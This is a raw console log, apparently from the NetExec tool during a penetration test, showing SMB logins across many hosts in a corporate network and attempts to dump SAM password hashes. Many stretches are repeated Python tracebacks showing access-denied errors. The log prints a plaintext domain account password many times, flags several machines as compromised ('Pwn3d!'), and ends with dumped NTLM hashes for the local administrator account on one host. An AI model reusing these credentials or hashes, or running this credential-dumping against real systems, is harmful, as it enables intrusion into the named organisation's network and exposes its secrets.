│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.92 445 OXODT020225 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.160.18 445 OXODT020113 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.49 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.160.139 445 OXODT020151 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.11 445 OXODT02030005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:48] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.161.3 445 OXODT02060001 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.161.4 445 OXODT02060004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.142 445 OXODT020077 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.133 445 OXOLT020048 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.33 445 OXODT020019 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.12 445 OXODT02030010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.123 445 OXODT020227 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.63 445 OXODT020037 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.100 445 OXOLT020007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.76 445 OXODT020146 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.53 445 OXOLT020058 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.94 445 OXOLT020023 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.108 445 OXODT020108 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.36 445 OXOLT020043 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.134 445 OXODT020115 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.114 445 OXODT020135 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.164.131 445 HPCZJ5240FXG [*] (name:HPCZJ5240FXG)
(domain:HPCZJ5240FXG) (signing:False) (SMBv1:False)
SMB 10.34.164.138 445 OXXNSRV2001 [*] Unix - Samba
(name:OXXNSRV2001) (domain:OXXNSRV2001) (signing:False) (SMBv1:True)
SMB 10.34.160.98 445 OXODT020021 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.133 445 OXXONSRV1000 [*] Unix - Samba
(name:OXXONSRV1000) (domain:OXXONSRV1000) (signing:False) (SMBv1:True)
[03:24:50] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.164.133 445 OXXONSRV1000 [+] OXXONSRV1000\


oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.160.14 445 OXODT020156 [-] Connection Error: [Errno
104] Connection reset by peer
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.161.5 445 OXODT02060010 [-] Connection Error: [Errno


104] Connection reset by peer
SMB 10.34.160.149 445 OXODT020149 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.31 445 OXODT020091 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.143 445 OXOLT020041 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.6 445 OXODT02040010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.48 445 OXODT020104 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.128 445 OXODT020063 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.67 445 OXODT020141 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.125 445 OXODT020007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.19 445 OXODT020042 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.112 445 OXODT020226 [-] Connection Error: [Errno
104] Connection reset by peer
[03:24:52] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.42 445 OXODT020006 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.150 445 OXODT020101 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.84 445 OXOLT020030 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.111 445 OXODT020099 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.144 445 OXOLT020004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.102 445 OXOLT020019 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.12 445 OXODT020086 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.66 445 OXODT020020 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.115 445 OXODT020114 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.26 445 OXODT020070 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.77 445 OXOLT020027 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.141 445 OXODT020105 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.10 445 OXODT02010001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.58 445 OXOLT020033 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.213 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.161.15 445 OXODT02060051 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.17 445 OXODT02040004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.24 445 OXODT02070011 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.20 445 OXODT02060005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.18 445 OXODT02030008 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.14 445 OXODT02070005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.19 445 OXODT02070021 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.22 445 OXODT02020002 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.56 445 OXOASP02007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.29 445 OXODT02020001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.37 445 OXODT02020004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.16 445 OXODT020118 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.28 445 OXODT02040007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.40 445 OXODT02040006 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.30 445 OXODT02020005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.129 445 OXOASP02004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯
DCERPCException: DCERPC Runtime Error: code: 0x5 -
rpc_s_access_denied

SMB 10.34.160.109 445 AKS160001 [-] AKS160001\


oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.132 445 OXXVSRV2000 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.129 445 OXOASP02004 [*] Dumping SAM hashes
SMB 10.34.162.131 445 OXXSDC0202 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.162.132 445 OXXVSRV2000 [*] Dumping SAM hashes
SMB 10.34.162.129 445 OXOASP02004
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:3db92beea06c5c52acd63ed8615e711
7:::
SMB 10.34.162.129 445 OXOASP02004
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[03:24:53] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey
